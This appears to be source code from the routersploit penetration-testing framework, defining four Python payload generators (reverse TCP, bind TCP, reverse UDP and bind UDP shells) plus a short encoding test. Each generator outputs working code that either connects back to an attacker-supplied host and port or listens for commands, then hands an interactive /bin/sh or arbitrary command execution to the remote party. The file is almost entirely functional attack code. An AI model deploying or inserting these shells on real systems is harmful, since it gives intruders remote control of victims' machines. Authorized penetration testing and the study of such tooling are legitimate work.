class Payload(ReverseTCPPayloadMixin, GenericPayload): __info__ = { "name": "Python Reverse TCP", "description": "Creates interactive tcp reverse shell by using python.", "authors": ( "Marcin Bury <marcin[at]threat9.com>", # routersploit module ), } architecture = Architectures.PYTHON encoder = OptString(Encoder(), "Encoder") def generate(self): return ("import socket,subprocess,os\n" + "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "s.connect(('{}',{}))\n".format(self.lhost, self.lport) + "os.dup2(s.fileno(),0)\n" + "os.dup2(s.fileno(),1)\n" + "os.dup2(s.fileno(),2)\n" + "p=subprocess.call([\"/bin/sh\",\"-i\"])")
class Payload(BindTCPPayloadMixin, GenericPayload): __info__ = { "name": "Python Bind TCP", "description": "Creates interactive tcp bind shell by using python.", "authors": ( "Marcin Bury <marcin[at]threat9.com>", # routersploit module ), } architecture = Architectures.PYTHON encoder = OptString(Encoder(), "Encoder") def generate(self): return ("import socket,os\n" + "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "so.bind(('0.0.0.0',{}))\n".format(self.rport) + "so.listen(1)\n" + "so,addr=so.accept()\n" + "x=False\n" + "while not x:\n" + "\tdata=so.recv(1024)\n" + "\tstdin,stdout,stderr,=os.popen3(data)\n" + "\tstdout_value=stdout.read()+stderr.read()\n" + "\tso.send(stdout_value)\n")
class Payload(ReverseTCPPayloadMixin, GenericPayload): __info__ = { "name": "Python Reverse UDP", "description": "Creates interactive udp reverse shell by using python.", "authors": ( "Andre Marques (zc00l)", # shellpop "Marcin Bury <marcin[at]threat9.com>" # routersploit module ), } architecture = Architectures.PYTHON encoder = OptString(Encoder(), "Encoder") def generate(self): return ("import os\n" + "import pty\n" + "import socket\n" + "s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" + "s.connect(('{}',{}))\n".format(self.lhost, self.lport) + "os.dup2(s.fileno(), 0)\n" + "os.dup2(s.fileno(), 1)\n" + "os.dup2(s.fileno(), 2)\n" + "pty.spawn('/bin/sh');\n" + "s.close()\n")
class Payload(BindTCPPayloadMixin, GenericPayload): __info__ = { "name": "Python Bind UDP", "description": "Creates interactive udp bind shell by using python.", "authors": ( "Andre Marques (zc00l)", # shellpop "Marcin Bury <marcin[at]threat9.com>", # routersploit module ), } architecture = Architectures.PYTHON encoder = OptString(Encoder(), "Encoder") def generate(self): return ( "from subprocess import Popen,PIPE\n" + "from socket import socket, AF_INET, SOCK_DGRAM\n" + "s=socket(AF_INET,SOCK_DGRAM)\n" + "s.bind(('0.0.0.0',{}))\n".format(self.rport) + "while 1:\n" "\tdata,addr=s.recvfrom(1024)\n" + "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" + "\ts.sendto(''.join([out[0],out[1]]),addr)\n")
def test_payload_enconding(): """ Test scenario - payload encoding """ encoder = Encoder() assert encoder.encode(bind_tcp) == bind_tcp_encoded